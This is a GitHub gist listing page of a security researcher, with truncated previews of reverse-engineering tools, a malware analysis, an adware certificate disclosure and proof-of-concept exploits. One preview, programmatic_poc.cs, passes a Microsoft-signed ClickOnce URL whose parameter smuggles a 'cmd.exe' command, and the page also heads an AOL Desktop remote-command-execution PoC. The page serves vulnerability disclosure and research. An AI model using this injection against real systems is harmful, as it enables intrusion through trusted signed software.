Skip to content

Instantly share code, notes, and snippets.

slipstream/RoL Wack0

View GitHub Profile
@Wack0
Wack0 / cex_crypto.cs
Created May 23, 2017
Compaq/HP Recovery Media (c. late 1990s-early 2000s) .CEX File Decryptor
View cex_crypto.cs
/*
Compaq/HP Recovery Media (c. late 1990s-early 2000s) .CEX File Decryptor
another rrrring of lightningggg production by slipstream/RoL!
Yesterday I received in the post some Compaq recovery media I ordered from Yahoo! Auctions Japan to dump.
Having done that, I took a closer look at the disc images.
The recovery media came in two CDs: a boot CD ("COMPAQ Restore CD"), and an OS CD ("Compaq CD for Microsoft Windows
NT Workstation 4.0 Operating System").
@Wack0
Wack0 / mastostats.php
Last active Apr 19, 2017
CLI Mastodon network stats script. Uses instances.mastodon.xyz. Updates every 60 seconds.
View mastostats.php
<?php
// This class adapted from: https://www.if-not-true-then-false.com/2010/php-class-for-coloring-php-command-line-cli-scripts-output-php-output-colorizing-using-bash-shell-colors/
class Colors {
private static $foreground_colors = array(
'black'=>'0;30',
'dark_gray'=>'1;30',
'blue'=>'0;34',
'light_blue'=>'1;34',
'green'=>'0;32',
@Wack0
Wack0 / blob10_pass.php
Created Jan 20, 2017
Blobby 10 password generation algorithm
View blob10_pass.php
<?php
// Blobby 10 zip-password generation algorithm.
array_shift($argv);
foreach ($argv as $zip) {
$p = '[';
$firstchar = ord($zip[0]);
$whitelisted_zips = array(
'9EIAC5FD.ZIP',
View gist:25a155e9f7ecef46da180b55b7e87931

Setup: https://www.virustotal.com/en/file/4280f729d317156706db6e9c87503d636f806e09efdfcf00e73dd3e71740c966/analysis/ App: https://www.virustotal.com/en/file/2260f04aff68f77102525c61ccab4680b869b27672f6939693b23c1c04c7fe82/analysis/ Unpacked + partially-deobfuscated: https://www.virustotal.com/en/file/f754f949651f628b3f1c1fbe327d7b87ea63ecdab6c59b8431d459e67b11cbd2/analysis/

Deobfuscated taskscheduler .xml string:

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2016-10-28T00:37:02.5049122</Date>
@Wack0
Wack0 / SbpParse.cs
Created Jan 13, 2017
Secure Boot Policy parser
View SbpParse.cs
using System;
using System.IO;
using LipingShare.LCLib.Asn1Processor;
using System.Runtime.InteropServices;
using System.Collections.Generic;
using System.Text;
using System.Security.Cryptography;
namespace SbpParse {
@Wack0
Wack0 / programmatic_poc.cs
Last active Dec 14, 2016
Command injection in MS' One Step / DPLauncher / "Get ready for the Internet" application, for UAC / RCE through social engineering using MS signed exe / clickonce.
View programmatic_poc.cs
using System;
using System.Runtime.InteropServices;
class DPPwned {
[DllImport("dfshim.dll")]
public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl,int data,int flags);
public static void Main() {
LaunchApplication("https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+",0,0);
@Wack0
Wack0 / adwareroi.md
Last active Apr 21, 2016
AdwareROI MiTM certificates and private keys
View adwareroi.md

AdwareROI

AdwareROI is basically the world's shittiest MiTM malware ever.

It's being sold for $5.5k for one panel/binary, $16k for multiple panels/binaries, and probably ten times that if you want src too. That doesn't include the SSL MiTM functionality which is another $1k.

And.. as I said, it's shitty. The MiTM functionality relies on WinDivert, the SSL MiTM uses a custom component, which is (seriously!) called mitm_test_poc. And it uses a hardcoded CA cert and private key, that's installed with the other components.

So, what to do but disclose these as I obtain them?

@Wack0
Wack0 / ayy-oh-lmao.js
Last active Dec 8, 2015
AOL Desktop <= 9.8.1 FS Read/Write via MITM, <= 9.8.0 Remote Command Execution via MITM PoC
View ayy-oh-lmao.js
/*
ayy-oh-lmao.js
AOL Desktop <= 9.8.0 File Write and Remote Command Execution via MITM
AOL Desktop <= 9.8.1 File Write via MITM.
by slipstream/RoL, between August and December 2015.
irc.rol.im #rol ** http://rol.im/chat/ ** twitter @TheWack0lian
The custom AOL protocol, includes a scripting language called FDO91 (FDO), that's compiled into a bytecode.
Compiled FDO makes up part of the data sent from server to client and client to server.
You can’t perform that action at this time.